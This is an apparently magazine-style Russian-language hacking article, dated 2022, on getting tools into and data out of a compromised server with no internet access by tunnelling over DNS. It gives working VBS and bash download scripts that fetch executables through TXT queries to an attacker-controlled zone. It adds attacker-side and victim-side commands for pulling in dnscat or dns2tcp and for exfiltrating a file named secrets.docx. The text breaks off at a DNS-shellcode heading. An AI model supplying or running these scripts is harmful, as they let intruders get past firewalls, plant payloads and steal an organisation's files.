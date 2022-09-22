Пред­ставь, что тебе уда­лось про­бить сетевой периметр и получить дос­туп к сер­веру. Сер­вер вхо­дит во внут­реннюю сеть ком­пании, а это зна­чит, что ты можешь про­ник­нуть и туда. Но, к сожале­нию, ском­про­мети­рован­ный узел находит­ся в DMZ и не име­ет выхода в интернет. Смо­жем ли мы проб­рать­ся внутрь теперь?

В боль­шинс­тве слу­чаев внут­ренние сети никак не огра­ничи­вают раз­решение DNS-имен про­изволь­ных зон. А пос­коль­ку при­рода DNS рас­пре­делен­ная, тот или иной DNS-зап­рос может при­ходить точ­но на под­кон­троль­ный сер­вер зло­умыш­ленни­ка. В ито­ге мы получим пол­ноцен­ный канал переда­чи дан­ных.

В наши дни сущес­тву­ют замеча­тель­ные решения для орга­низа­ции целых VPN-тун­нелей через DNS, такие как iodine. При этом, даже если ты не име­ешь прав root, ты всег­да можешь вос­поль­зовать­ся dnscat или dns2tcp, который проб­росит про­изволь­ное соеди­нение, ска­жем, на прок­си. И в том и в дру­гом слу­чае ты смо­жешь пре­одо­леть огра­ниче­ния фай­рво­лов и начать прод­вижение по внут­ренней сети.

Но оста­ется нерешен­ным глав­ный воп­рос: как передать эти прог­раммы в ском­про­мети­рован­ную сеть? В этом нам поможет на­бор моих скрип­тов для инфиль­тра­ции и эксфиль­тра­ции дан­ных на все слу­чаи жиз­ни. Глав­ная их осо­бен­ность в пол­ном отсутс­твии тре­бова­ний к адми­нис­тра­тив­ным при­виле­гиям и при­цел на перено­симость — ведь на иссле­дуемом сер­вере ока­жет­ся либо Windows, либо Linux.

Инфильтрация через DNS

DNS — наш незаме­нимый помощ­ник. С помощью сле­дующе­го кода мы можем ска­чать любой файл с исполь­зовани­ем DNS на любую Windows:

dns_download.vbs

On Error Resume Next Set objShell = CreateObject ( "WScript. Shell" ) Set writer = CreateObject ( "Scripting. FileSystemObject" ) . createtextfile ( "c:\ windows\ temp\ out. exe" ) For d = 1 To 1190 pos = 0 While pos = 0 Set exec = objShell . Exec ( "nslookup -type=txt d" & d& ". txt. yourzone. tk" ) res = exec . Stdout . ReadAll ( ) pos = inStr ( 1 , res , "?" ) txt = Mid ( res , pos + 1 , 253 ) Wscript . Echo d & " " & txt Wend For b = 0 To Len ( txt ) / 2 - 1 writer . Write Chr ( CInt ( "& H" & Mid ( txt , 1 + b * 2 , 2 )) ) Next Next

А вот скрипт для Linux:

dns_download.sh

#!/ bin/ bash for i in ` seq $2 ` do answ = ` host -t txt "d $i . txt. $1 " |cut -d ' ' -f 4 ` echo ${ answ :2:-1 } | xxd -r -p - > > $3 echo $i ${ answ :2:-1 } done

Язык VBS обес­печива­ет нам стоп­роцен­тную перено­симость меж­ду все­ми вер­сиями Windows (в отли­чие от PowerShell). Под Linux, как всег­да, исполь­зуем bash.

На сто­роне ском­про­мети­рован­ного сер­вера скрип­ты запус­кают­ся сле­дующим обра­зом.

Ва­риант для Windows:

cscript. exe dns_ download. vbs

Для Linux:

. / dns_ download. sh attacker. tk 1190 / tmp/ dnscat

На сто­роне ата­кующе­го — так:

sudo . / dns_ upload. py --udp --file dnscat. exe

Нап­ример, на скрин­шотах ниже прог­рамма dns2tcpc. exe переда­ется через DNS с NS-сер­вера под­кон­троль­ной мне DNS-зоны на victim с исполь­зовани­ем чис­того VBS.

Про­изволь­ные дан­ные будут про­ходить через TXT-записи в виде hexastring.

Да­лее мы можем раз­вивать DNS-тун­нелиро­вание уже с исполь­зовани­ем при­выч­ных инс­тру­мен­тов.

Эксфильтрация через DNS

Ана­логич­ным обра­зом мы можем и выг­ружать фай­лы с victim. На ата­кующей сто­роне это дела­ется так:

sudo . / dns_ download. py --udp --file secrets. docx

На сто­роне жер­твы — так:

cscript. exe dns_ upload. vbs c: \ path\ to\ secrets. docx attacker. tk

DNS-шелл-код